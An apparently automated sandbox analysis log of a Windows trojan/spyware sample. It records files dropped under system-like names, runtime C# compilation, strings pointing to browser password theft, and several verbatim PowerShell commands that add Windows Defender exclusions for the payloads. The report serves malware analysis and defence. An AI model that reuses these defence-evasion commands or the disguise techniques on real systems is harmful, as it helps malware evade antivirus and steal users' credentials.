Source: svchost.exe, 00000034.00000003.1866084978.0000025729306000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: gbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.dr | String found in binary or memory: https://www.ecosia.org/newtab/
Source: gbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: C:\Recovery\RuntimeBroker.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\Desktop\s5duotgoYD.exe | File created: C:\Windows\twain_32\xKVBpkhCEjg.exe
Source: C:\Users\user\Desktop\s5duotgoYD.exe | File created: C:\Windows\twain_32\xKVBpkhCEjg.exe\:Zone.Identifier:$DATA
Source: C:\Users\user\Desktop\s5duotgoYD.exe | File created: C:\Windows\twain_32\04bb35a44deda9
Source: C:\Users\user\Desktop\s5duotgoYD.exe | File created: C:\Windows\ModemLogs\conhost.exe
Source: C:\Users\user\Desktop\s5duotgoYD.exe | File created: C:\Windows\ModemLogs\conhost.exe\:Zone.Identifier:$DATA
Source: C:\Users\user\Desktop\s5duotgoYD.exe | File created: C:\Windows\ModemLogs\088424020bedd6
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\CSC5850B7348A2C4AEC99A5FCDCA9CA019.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File deleted: C:\Windows\System32\CSC5850B7348A2C4AEC99A5FCDCA9CA019.TMP
Source: C:\Users\user\Desktop\s5duotgoYD.exe | Code function: 0_2_00007FFD9BBEB84C
Source: C:\Users\user\Desktop\s5duotgoYD.exe | Code function: 0_2_00007FFD9BBEDB1D
Source: C:\Recovery\RuntimeBroker.exe | Code function: 50_2_00007FFD9B7D0D78
Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe | Code function: 55_2_00007FFD9B7F0D78
Source: Joe Sandbox View | Dropped File: C:\Users\user\Desktop\CjKcCUFn.log DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
Source: s5duotgoYD.exe, 00000000.00000000.1674094332.0000000000B82000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs s5duotgoYD.exe
Source: s5duotgoYD.exe, 00000000.00000002.1844244735.000000001C31C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs s5duotgoYD.exe
Source: s5duotgoYD.exe, 0000002B.00000002.2591651343.0000000002B71000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs s5duotgoYD.exe
Source: s5duotgoYD.exe, 0000002C.00000002.2620769585.0000000003492000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs s5duotgoYD.exe
Source: s5duotgoYD.exe, 0000002C.00000002.2620769585.0000000003548000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs s5duotgoYD.exe
Source: s5duotgoYD.exe, 0000002C.00000002.2620769585.0000000003481000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs s5duotgoYD.exe
Source: s5duotgoYD.exe | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs s5duotgoYD.exe
Source: s5duotgoYD.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: s5duotgoYD.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: backgroundTaskHost.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: xKVBpkhCEjg.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: conhost.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: xKVBpkhCEjg.exe0.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: s5duotgoYD.exe, TZsYfkGWttIQxKOaTbt.cs | Cryptographic APIs: 'CreateDecryptor'
Source: classification engine | Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@48/304@1/2
Source: C:\Users\user\Desktop\s5duotgoYD.exe | File created: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe
Source: C:\Users\user\Desktop\s5duotgoYD.exe | File created: C:\Users\user\Desktop\vEZKvYQi.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8784:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3916:120:WilError_03
Source: C:\Recovery\RuntimeBroker.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-vm4EBTsnJo8jd1Wf9GAL
Source: C:\Users\user\Desktop\s5duotgoYD.exe | File created: C:\Users\user\AppData\Local\Temp\ozb03vs1
Source: C:\Users\user\Desktop\s5duotgoYD.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TCq2JLUA0X.bat"
Source: s5duotgoYD.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: s5duotgoYD.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\s5duotgoYD.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Recovery\RuntimeBroker.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\s5duotgoYD.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\s5duotgoYD.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Tzs684hvW4.49.dr, fYndCqG0r1.49.dr, xumrD4OgFL.49.dr, mpxD1ADmWr.49.dr, RrAXcxNFr4.49.dr, wBKrMkWpSW.49.dr, ntNjWhMxD7.49.dr, PSrOWPS5Hg.49.dr, o5OsbWHzyw.49.dr, Sn3W2nJxyf.49.dr, hPnfeGbZUW.49.dr, FP2r13DsCc.49.dr, 2vKFolEJK9.49.dr, xieclsHeHM.49.dr, EHNPFb26nV.49.dr, tANKlu2qTk.49.dr, imCKtO89av.49.dr, SMc6EeBQ3A.49.dr, MCPccexigN.49.dr, fvidO5EBb5.49.dr, ggdRal4OQZ.49.dr, zJz3GZ0Bww.49.dr, jUvhx71Sb8.49.dr, EWWOdovFBp.49.dr, hTuTeeEzD5.49.dr, Iuw1difRUU.49.dr, KMkj7FlQZr.49.dr, Bcy3AgBJG1.49.dr, nyjURLBGAE.49.dr, ufodWiTSVv.49.dr, OUF1m4kxkl.49.dr, 48xXbRpi02.49.dr, Vp2qhV3Hsl.49.dr, JF6PppDecd.49.dr, 4WFD8vwzmv.49.dr, KVCJaEG3iK.49.dr, cAxrBTc2GY.49.dr, 7of1Pi4HGN.49.dr, tpYuBwJhMu.49.dr, CuLCMj9lRH.49.dr, NPRdKOHmNL.49.dr, u0pqMhdtCG.49.dr, w5P9tOjZ4B.49.dr, u1fNVTMfcd.49.dr, RAIjWuSd0z.49.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: s5duotgoYD.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\s5duotgoYD.exe | File read: C:\Users\user\Desktop\s5duotgoYD.exe
Source: unknown | Process created: C:\Users\user\Desktop\s5duotgoYD.exe "C:\Users\user\Desktop\s5duotgoYD.exe"
Source: C:\Users\user\Desktop\s5duotgoYD.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA9C5.tmp" "c:\Windows\System32\CSC5850B7348A2C4AEC99A5FCDCA9CA019.TMP"
Source: C:\Users\user\Desktop\s5duotgoYD.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
Source: C:\Users\user\Desktop\s5duotgoYD.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ModemLogs\conhost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\s5duotgoYD.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\twain_32\xKVBpkhCEjg.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\s5duotgoYD.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe'
Source: C:\Users\user\Desktop\s5duotgoYD.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xKVBpkhCEjg.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\s5duotgoYD.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s5duotgoYD.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe "C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe"
Source: C:\Users\user\Desktop\s5duotgoYD.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TCq2JLUA0X.bat"
Source: unknown | Process created: C:\Windows\ModemLogs\conhost.exe C:\Windows\ModemLogs\conhost.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\s5duotgoYD.exe | Process created: C:\Windows\ModemLogs\conhost.exe C:\Windows\ModemLogs\conhost.exe
Source: unknown | Process created: C:\Recovery\RuntimeBroker.exe C:\Recovery\RuntimeBroker.exe
                              Source: unknownProcess created: C:\Recovery\RuntimeBroker.exe C:\Recovery\RuntimeBroker.exe
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: unknownProcess created: C:\Users\user\Desktop\s5duotgoYD.exe C:\Users\user\Desktop\s5duotgoYD.exe
                              Source: unknownProcess created: C:\Users\user\Desktop\s5duotgoYD.exe C:\Users\user\Desktop\s5duotgoYD.exe
                              Source: unknownProcess created: C:\Recovery\xKVBpkhCEjg.exe C:\Recovery\xKVBpkhCEjg.exe
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: unknownProcess created: C:\Recovery\xKVBpkhCEjg.exe C:\Recovery\xKVBpkhCEjg.exe
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\RuntimeBroker.exe "C:\Recovery\RuntimeBroker.exe"
                              Source: unknownProcess created: C:\Recovery\RuntimeBroker.exe "C:\Recovery\RuntimeBroker.exe"
                              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                              Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: unknownProcess created: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe "C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe"
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ModemLogs\conhost.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\twain_32\xKVBpkhCEjg.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xKVBpkhCEjg.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s5duotgoYD.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TCq2JLUA0X.bat" Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA9C5.tmp" "c:\Windows\System32\CSC5850B7348A2C4AEC99A5FCDCA9CA019.TMP"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\RuntimeBroker.exe "C:\Recovery\RuntimeBroker.exe"
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: apphelp.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: version.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: wldp.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: profapi.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: ktmw32.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: ntmarta.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: wbemcomn.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: amsi.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: userenv.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: propsys.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: dlnashext.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: wpdshext.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: edputil.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: urlmon.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: iertutil.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: srvcli.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: netutils.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: windows.staterepositoryps.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: wintypes.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: appresolver.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: bcp47langs.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: slc.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: sppc.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: onecorecommonproxystub.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Section loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
